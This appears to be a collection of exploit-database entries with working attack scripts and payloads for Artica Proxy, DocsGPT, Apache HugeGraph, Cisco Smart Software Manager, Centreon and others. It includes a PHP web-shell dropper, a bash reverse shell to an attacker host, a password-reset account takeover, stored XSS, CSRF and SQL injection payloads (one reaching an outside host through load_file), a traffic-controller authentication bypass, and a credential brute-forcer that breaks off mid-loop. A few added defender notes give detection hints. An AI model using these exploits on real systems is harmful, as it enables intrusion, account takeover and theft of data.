
Artica Proxy 4.50 - Remote Code Execution (RCE)
# Exploit Title: Artica Proxy 4.50 - Remote Code Execution (RCE) # Date: 23-04-2024 # Exploit Author: Madan # Vendor Homepage: https://artica-proxy.com/ # Version: 4.40, 4.50 # Tested on: [relevant os] # CVE : CVE-2024-2054 you can also find the exploit on my github repo: https://github.com/Madan301/CVE-2024-2054 import requests import base64 import urllib3 from colorama import Fore print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might sometimes vary from how artica proxy interface is hosted") URL = input("Enter url: ") if URL[-1]=="/": ACTUAL_URL = URL[:-1] else: ACTUAL_URL = URL ARTICA_URL = ACTUAL_URL def check(ARTICA_URL): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) try: check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False) except Exception as e: print(Fore.RED+"Could not reach, check URL") if check.status_code==200: print(Fore.GREEN+"Vulnerable") return True else: print(Fore.RED+"Not Vulnerable") def exploit(ARTICA_URL): payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode() payload_data = { "TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": { "cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php", "cache_serializer": "json", "cache_size": 999999999, "cache_data": { payload: { "cache_date": 0, "ttl": 999999999 } } } } while True: PAYLOAD_CMD = input("enter command: ") url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}" urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) response = requests.get(url, verify=False) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) if response.status_code == 200: cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}" cmd_response = requests.get(cmd_url, verify=False) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) print(cmd_response.text) else: print("Failed to execute the payload") check = check(ARTICA_URL=ACTUAL_URL) if check==True: exploit(ARTICA_URL=ARTICA_URL)
DocsGPT 0.12.0 - Remote Code Execution
# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution # Date: 09/04/2025 # Exploit Author: Shreyas Malhotra (OSMSEC) # Vendor Homepage: https://github.com/arc53/docsgpt # Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip # Version: 0.8.1 through 0.12.0 # Tested on: Debian Linux/Ubuntu Linux/Kali Linux # CVE: CVE-2025-0868 import requests # TARGET CONFIG TARGET = "http://10.0.2.15:7091" # Change this # Malicious payload string - carefully escaped - modify the python code if necessary malicious_data = ( 'user=1&source=reddit&name=other&data={"source":"reddit",' '"client_id":"1111","client_secret":1111,"user_agent":"111",' '"search_queries":[""],"number_posts":10,' '"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}' ) headers = { "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data) print(f"[+] Status Code: {response.status_code}") print("[+] Response Body:") print(response.text) except Exception as e: print(f"[-] Error sending request: {e}")
Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)
# Exploit Title: Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
# Version: Apache HugeGraph 1.0.0 - 1.2.0
# CVE : CVE-2024–27348
#   (NOTE(review): the id above contains an en dash; the canonical form is CVE-2024-27348.)
#
# Defender notes (review):
# - One POST to <url>/gremlin carrying a gremlin-groovy script. The script body
#   below is a usable detection signature: `Class.forName("java.lang.Thread")`,
#   setting the thread name to "VICARIUS", `java.lang.ProcessBuilder` obtained
#   by reflection, and a `/dev/tcp/` redirection to lhost:lport.
# - The prepared request's Content-Type header is deleted before sending
#   (`del prepped.headers['Content-Type']`); a /gremlin POST without a
#   Content-Type is itself unusual and worth logging.
# - Mitigation: enable the server's authentication system, restrict /gremlin
#   to trusted networks, and apply the fix for the CVE above.

from requests import Request, Session
import sys
import json  # NOTE(review): unused in this script


def title():
    """Print the banner (the original ASCII art was flattened by the page extraction)."""
    print(''' ______ _______ ____ ___ ____ _ _ ____ _____ _____ _ _ ___ / ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \___ |___ /| || | ( _ ) | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) | / / |_ \| || |_ / _ \ | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ / / ___) |__ _| (_) | \____| \_/ |_____| |_____|\___/_____| |_| |_____/_/ |____/ |_| \___/ [+] Reverse shell Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py ''')


def exploit(url, lhost, lport):
    """Send one gremlin-groovy script to <url>/gremlin and print the exchange.

    url   -- base URL of the HugeGraph server (/gremlin is appended here).
    lhost -- listener host embedded in the script's /dev/tcp/ redirection.
    lport -- listener port embedded in the same redirection.

    TLS verification is disabled and the request times out after 15 s. Nothing
    is returned; headers, URL, payload, status and body are printed for
    inspection. No authentication is sent.
    """
    payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
    headers = { 'Content-Type': 'application/json'}
    s = Session()
    url = url + "/gremlin"
    req = Request('POST', url, json=payload, headers=headers)
    prepped = req.prepare()
    # The JSON body is kept but the Content-Type header set above is removed
    # again before the request goes out.
    del prepped.headers['Content-Type']
    resp = s.send(prepped, verify=False, timeout=15)
    print(prepped.headers)
    print(url)
    print(resp.headers)
    print(payload)
    print(resp.status_code)
    print(resp.text)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 4):
        print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))
        print('[+] Do not forget to run the listener: nc -lvp 4444\n')
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2],sys.argv[3])
Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS) # Date: 04/28/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://anchorcms.com/ # Software Link: https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip # Version: latest # Tested on: MacOS # Log in to Anchor CMS. # Click on "Create New Post". # Fill in the "Title" and enter the following payload in the field immediately below: # "><script>alert()</script> # Go to the homepage, and you will see the alert! ### PoC Request ### POST /anchor/admin/posts/edit/2 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 278 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/anchor/admin/posts/edit/2 Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta; anchorcms=hlko7b1dbdpjgn58himf2obht5 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false
Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege
# Exploit Title: ManageEngine ADManager Plus Build < 7210 Elevation of Privilege Vulnerability # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/ad-manager/ # Details: https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409 # Version: ADManager Plus Build < 7210 # Tested against: Build 7203 # CVE: CVE-2024-24409 # Description The Modify Computers is a predefined role in ADManager for managing computers. If a technician user has the Modify Computers privilege over a computer, they can change the userAccountControl and msDS-AllowedToDelegateTo attributes of the computer object. In this way, the technician user can set Constrained Kerberos Delegation over any computer within the Organizational Unit that the user was delegated. Contrary to what ADManager claims, the user who has the Modify Computers role can change the privilege of computer objects in the Active Directory. The Constrained Kerberos Delegation can be set for any service such as CIFS, LDAP, HOST services. Then the user can access these services by abusing the Constrained Kerberos Delegation. In addition, the Unconstrained Kerberos Delegation can be set over the computer objects by changing the userAccountControl attribute. Normally, only users that have SeEnableDelegationPrivilege privilege can set constrained kerberos delegation. Only members of the BUILTIN\Administrators group have this privilege by default. The delegated user for an Organizational Unit cannot set constrained kerberos delegation even if a user has the GenericAll right over a computer account, so the delegation process in Active Directory does not grant this privilege. However, the technician user can use the SeEnableDelegationPrivilege right via the Modify Computers role. # Vulnerability reasons 1. 
ADMP Web App Authorization issue: Assigning a predefined Modify Computers role delegates the technician user to modify custom attributes of computers unexpectedly. Even though it appears that this privilege is not granted in the UI, the Additional Custom Attribute property is assigned and this leads to broken access control vulnerability. 2. There is no restriction for editing the userAccountControl and msDS-AllowedToDelegateTo attributes of the computer objects. The ADMP application performs changes with domain admin privileges as designed so that if we can bypass some restrictions (e.g. format of attribute value), our requests are applied with domain admin privileges. This way we can edit the attributes userAccountControl and msDS-AllowedToDelegateTo. # Impact A technician user elevates privileges from Domain User to Domain Admin. For example, the user can set Constrained Kerberos Delegation over CLIENT1$ for the CIFS service of the domain controller and access the CIFS service. As a result, the user is delegated to manage CLIENT1$ but he can access the CIFS service of the domain controller impersonating a user unexpectedly. # Proof Of Concept https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)
# Exploit Title: Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 07/09/2024 # Exploit Author: Andrew Lemon/Red Threat https://redthreatsec.com # Vendor Homepage: https://www.q-free.com # Software Link: N/A # Version: 1.9 # Tested on: (Intelight x-1) Linux 3.14.57 # CVE : CVE-2024-38944 ## Vulnerability Description This vulnerability allows remote attackers to bypass authentication on affected installations of MaxTime Database Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI on Traffic Controllers running version 1.9.x firmware. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to gain full control of Intelight Traffic Controllers and modify the configuration of a traffic intersection, modify traffic light sequences, or trigger the intersection to go into 4 way flash causing a denial of service and causing traffic congestion. ## Steps to Reproduce Navigate to the IP address of an identified controller When prompted for authentication append /cgi-bin/generateForm.cgi?formID=142 to the end of the IP address Under the web security tab change the drop down from enabled to disabled and select apply or take note of the username and password and login with those.
ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)
# Exploit Title: ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) # Date: 8-7-2024 # Category: Web Application # Exploit Author: Jeremia Geraldi Sihombing # Version: 2.10.1 # Tested on: Windows # CVE: CVE-2024-39143 Description: ---------------- A stored cross-site scripting (XSS) vulnerability exists in ResidenceCMS 2.10.1 that allows a low-privilege user to create malicious property content with HTML inside it, which acts as a stored XSS payload. If this property page is visited by anyone including the administrator, then the XSS payload will be triggered. Steps to reproduce ------------------------- 1. Login as a low privilege user with property edit capability. 2. Create or edit one of the user-owned properties (we can use the default property owned by the user). 3. Fill the content form with XSS payload using the Code View feature. Before saving it make sure to go back using the usual view to see if the HTML is rendered or not. Vulnerable parameter name: property[property_description][content] Example Payload: <img src="x" onerror="alert(document.cookie)"> 4. After saving the new property content and clicking the 'Finish Editing', go to the page and see the XSS is triggered. It is possible to trigger the XSS by using any account or even an unauthorized account. 
Burp Request ------------------- POST /en/user/property/7/edit HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1111 Origin: http://localhost Connection: keep-alive Referer: http://localhost/en/user/property/7/edit Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~; PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=1 property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished renovated 2-bedroom 2-bathroom flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore Blvd, Tampa, FL 33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg
Feng Office 3.11.1.2 - SQL Injection
# Exploit Title: Feng Office 3.11.1.2 - SQL Injection # Date: 7/2024 # Exploit Author: Andrey Stoykov # Version: 3.11.1.2 # Tested on: Ubuntu 22.04 # Blog: http://msecureltd.blogspot.com SQL Injection: 1. Login to application 2. Click on "Workspaces" 3. Copy full URL 4. Paste the HTTP GET request into text file 5. Set the injection point to be in the "dim" parameter value 6. Use SQLMap to automate the process sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=mysql -p dim --fingerprint [...] [12:13:03] [INFO] confirming MySQL [12:13:04] [INFO] the back-end DBMS is MySQL [12:13:04] [INFO] actively fingerprinting MySQL [12:13:05] [INFO] executing MySQL comment injection fingerprint web application technology: Apache back-end DBMS: active fingerprint: MySQL >= 5.7 comment injection fingerprint: MySQL 5.7.37 [...]
PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)
# Exploit Title: PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) # Date: 2024-07-01 # Exploit Author: Vuln Seeker Cybersecurity Team # Vendor Homepage: https://wordpress.org/plugins/pz-frontend-manager/ # Version: <= 1.0.5 # Tested on: Firefox # Contact me: vulns@vulnseeker.org The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks. Proof of concept: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost:10003 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1093 Origin: http://localhost:10003 Sec-GPC: 1 Connection: close Cookie: Cookie action=pzfm_upload_avatar&imageData=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx%2FBy7bYvtl4Y8Qn%2BtEjty6WxuQ0KkfOM5wJEeEkT1bsigU%2BxGQV%2BQfZ2ned0LAkLnyQ4XV2XB%2Fk%2BjXdTs8Mc1%2BUlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO%2BqN1sFvJm%2BIScB7s3uo8ZVzC8RrsXjIuqp2n0d%2BsxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6Jf2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rvD9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg%3D%3D&userID=1 CSRF Exploit: <html> <body> <form 
action="http://localhost:10003/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="pzfm_upload_avatar" /> <input type="hidden" name="imageData" value="" /> <input type="hidden" name="userID" value="1"" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> Profile picture of user 1 will be changed in the dashboard http://localhost:10003/dashboard/?dashboard=profile Reference: https://wpscan.com/vulnerability/73ba55a5-6cff-40fc-9686-30c50f060732/
ChurchCRM 5.9.1 - SQL Injection
# Exploit Title: ChurchCRM 5.9.1 - SQL Injection # Author: Sanan Qasimzada # Date: 06.07.2024 # Vendor: http://churchcrm.io/ # Software: https://github.com/ChurchRM/CRM # Reference: https://portswigger.net/web-security/sql-injection # Description: In the manual insertion point 1 - parameter `EID` appears to be vulnerable to SQL injection attacks. No need for cookies, no need admin authentication and etc. The attacker easily can steal information from this system by using this vulnerability. STATUS: HIGH Vulnerability - CRITICAL [+]Payload: ```mysql --- Parameter: EID (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com \\ior')) OR NOT 2407=2407 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com \\ior')) AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX) Type: UNION query Title: MySQL UNION query (UTF8) - 11 columns Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com \\ior')) UNION ALL SELECT 'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'# --- ``` # Reproduce: [href]( https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1 ) # Proof and Exploit: [href](https://streamable.com/1eqhw2) # Time spend: 01:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration 
Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover
# Exploit Title: Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover
# Google Dork: N/A
# Date: 21/07/2024
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/smart-software-manager-satellite/datasheet-c78-734539.html
# Version: 8-202206 and earlier
# Tested on: Kali Linux
# CVE : CVE-2024-20419
# Security Advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
# Technical Analysis: https://www.0xpolar.com/blog/CVE-2024-20419
#
# Defender notes (review):
# - Three requests, none carrying a login: GET /backend/settings/oauth_adfs?hostname=polar
#   (only to harvest the XSRF-TOKEN and _lic_engine_session cookies), then
#   POST /backend/reset_password/generate_code with {"uid": <user>}, then
#   POST /backend/reset_password with the returned auth_token and a new password.
#   A generate_code -> reset_password sequence from a session that never
#   authenticated is the log pattern to alert on.
# - The replacement password is hard-coded ("Polar@123456780"); an admin account
#   found with that password during IR is a direct indicator of this script.
# - Mitigation: follow the Cisco advisory linked above; the header lists
#   8-202206 and earlier as affected.

import requests, sys
from urllib.parse import unquote

# Suppress SSL warnings
requests.packages.urllib3.disable_warnings()

Domain = sys.argv[1]  # Domain, https://0xpolar.com:8443
Username = sys.argv[2]  # Username, by default its [admin]
password = "Polar@123456780"

print("[*] Cisco Smart Software Manager On-Prem")
print("[*] Account Takeover Exploit")
print("[*] Target: "+Domain)
print("[*] Username: "+Username)
print("\n")
print("[*] Getting Necessary Tokens..")

# TLS verification is disabled for every request in this script.
get_url = Domain+"/backend/settings/oauth_adfs?hostname=polar"
response = requests.get(get_url, verify=False)


def get_cookie_value(headers, cookie_name):
    """Return the value of `cookie_name` from a Set-Cookie header, or None.

    headers     -- a requests response headers mapping.
    cookie_name -- substring matched against each cookie fragment.

    NOTE(review): the header is split on ',' first, so a cookie whose attributes
    contain a comma (e.g. an Expires date) is split mid-cookie; matching is by
    substring, and the value is taken as everything after the first '='.
    """
    cookies = headers.get('Set-Cookie', '').split(',')
    for cookie in cookies:
        if cookie_name in cookie:
            parts = cookie.split(';')
            for part in parts:
                if cookie_name in part:
                    return part.split('=')[1].strip()
    return None


set_cookie_headers = response.headers.get('Set-Cookie', '')  # NOTE(review): unused
xsrf_token = get_cookie_value(response.headers, 'XSRF-TOKEN')
lic_engine_session = get_cookie_value(response.headers, '_lic_engine_session')

# The cookie value is URL-encoded; the header below needs the decoded form.
if xsrf_token:
    xsrf_token = unquote(xsrf_token)

if not lic_engine_session or not xsrf_token:
    print("Required cookies not found in the response.")
else:
    print("[+] lic_engine_session: "+lic_engine_session)
    print("[+] xsrf_token: "+xsrf_token)
    print("\n[*] Generating Auth Token")
    post_url = Domain+"/backend/reset_password/generate_code"
    headers = {
        'Accept': 'application/json',
        'Content-Type': 'application/json',
        'X-Xsrf-Token': xsrf_token,
        'Sec-Ch-Ua': '',
        'Sec-Ch-Ua-Mobile': '?0',
    }
    cookies = {
        '_lic_engine_session': lic_engine_session,
        'XSRF-TOKEN': xsrf_token,
    }
    payload = {
        'uid': Username
    }
    post_response = requests.post(post_url, headers=headers, cookies=cookies, json=payload, verify=False)
    # NOTE(review): .json() raises if the body is not JSON; nothing catches that.
    post_response_json = post_response.json()
    auth_token = post_response_json.get('auth_token')
    if not auth_token:
        print("auth_token not found in the response.")
    else:
        print("[+] Auth Token: "+auth_token)
        print("\n[*] Setting Up a New Password")
        final_post_url = Domain+"/backend/reset_password"
        final_headers = {
            'Accept': 'application/json',
            'Content-Type': 'application/json',
            'X-Xsrf-Token': xsrf_token,
        }
        final_cookies = {
            '_lic_engine_session': lic_engine_session,
            'XSRF-TOKEN': xsrf_token,
        }
        final_payload = {
            'uid': Username,
            'auth_token': auth_token,
            'password': password,
            'password_confirmation': password,
            'common_name': ''
        }
        final_post_response = requests.post(final_post_url, headers=final_headers, cookies=final_cookies, json=final_payload, verify=False)
        response_text = final_post_response.text
        # Success is judged only by the substring "OK" appearing in the body.
        if "OK" in response_text:
            print("[+] Password Successfully Changed!")
            print("[+] Username: "+Username)
            print("[+] New Password: "+password)
        else:
            print("[!] Something Went Wrong")
            print(response_text)
Centron 19.04 - Remote Code Execution (RCE)
# Exploit Title : Centron 19.04 - Remote Code Execution (RCE)
# Tested on Centreon API 19.04.0
# Centreon 19.04 - Login Password Bruteforcer
# Written on 6 Nov 2019
# Referencing API Authentication of the Centreon API document
# Author: st4rry
# centbruteon.py
# Centreon Download Link: https://download.centreon.com/#version-Older
# Dependencies: sys, requests, argparse, termcolor, os
#
# Defender notes (review):
# - Despite the title, the code below is a credential brute-forcer, as its own
#   header says: one POST per password to /centreon/api/index.php?action=authenticate
#   with form fields `username` and `password`, success judged by a 200 status.
# - The log signature is a burst of POSTs to that endpoint from one source with a
#   fixed username and varying password (or, in multi-user mode, both varying),
#   most answered with non-200. Rate limiting, account lockout and alerting on
#   authentication failure volume for the API endpoint are the mitigations.
#!/usr/bin/env python3
# NOTE(review): a shebang only takes effect on the first line of a file; here
# it is an ordinary comment.
import sys
import requests
import argparse
from termcolor import colored
import os  # NOTE(review): unused


def main():
    """Parse arguments and dispatch to the single-user or multi-user loop.

    -u host (required), -p port (default 80), --https, -l username or -L
    username file, -w password file (required), --insecure (verify=False),
    --ca-bundle (path passed to requests as `verify`). Exits 1 with usage when
    called without arguments, and 1 when neither -l nor -L is given.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', dest='host', help='Define your target URL', required=True)
    parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80)
    parser.add_argument('--https', dest='https', action='store_true', help='Use HTTPS instead of HTTP')
    parser.add_argument('-l', dest='username', help='Specific username')
    parser.add_argument('-L', dest='userfile', type=argparse.FileType('r'), help='Username wordlist')
    parser.add_argument('-w', dest='passwfile', type=argparse.FileType('r'), help='Specify Password wordlist', required=True)
    parser.add_argument('--insecure', action='store_true', help='Skip SSL certificate verification')
    parser.add_argument('--ca-bundle', dest='ca_bundle', help='Path to custom CA bundle')
    if len(sys.argv) == 1:
        parser.print_help(sys.stderr)
        sys.exit(1)
    args = parser.parse_args()
    protocol = 'https' if args.https else 'http'
    server = f"{protocol}://{args.host}:{args.port}"
    user = args.username
    passfile = args.passwfile.read().splitlines()
    userfile = args.userfile
    dirlo = '/centreon/api/index.php?action=authenticate'
    # `verify` is either a bool or a CA-bundle path; --ca-bundle wins over --insecure.
    verify_ssl = not args.insecure
    if args.ca_bundle:
        verify_ssl = args.ca_bundle
    if user:
        brute_force_single_user(server, user, passfile, dirlo, verify_ssl)
    elif userfile:
        usrwl = userfile.read().splitlines()
        brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl)
    else:
        print(colored('Something went wrong!', 'red'))
        sys.exit(1)


def brute_force_single_user(server, user, passfile, dirlo, verify_ssl):
    """Try every password in `passfile` for one `user`; stop at the first 200.

    server     -- scheme://host:port prefix.
    user       -- the single username tried.
    passfile   -- list of candidate passwords.
    dirlo      -- API path appended to `server`.
    verify_ssl -- passed straight to requests as `verify`.

    NOTE(review): the try block wraps only print statements, so `except
    IndexError` is effectively unreachable; requests errors are not caught.
    The "403" message is printed for any non-200 status.
    """
    for password in passfile:
        data = {'username': user, 'password': password}
        r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
        try:
            print('Processing...')
            print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') + colored(' Username: ', 'yellow') + colored(user, 'yellow') + colored(' Password: ', 'yellow') + colored(password, 'yellow'))
            if r.status_code == 200:
                print(colored('Credentials found: username: ', 'green') + colored(user, 'green') + colored(' password: ', 'green') + colored(password, 'green') + colored(' server: ', 'green') + colored(server, 'green'))
                print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
                print('\n')
                break
            else:
                print(colored('403 - Unauthenticated!', 'red'))
        except IndexError:
            print(colored('Something went wrong', 'red'))


def brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl):
    """Same loop as brute_force_single_user, for every username in `usrwl`.

    Unlike the single-user variant there is no `break`, so every password is
    tried for every user even after a 200. Same caveats on the try/except.
    """
    for usr in usrwl:
        for password in passfile:
            data = {'username': usr, 'password': password}
            r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
            try:
                print('Processing...')
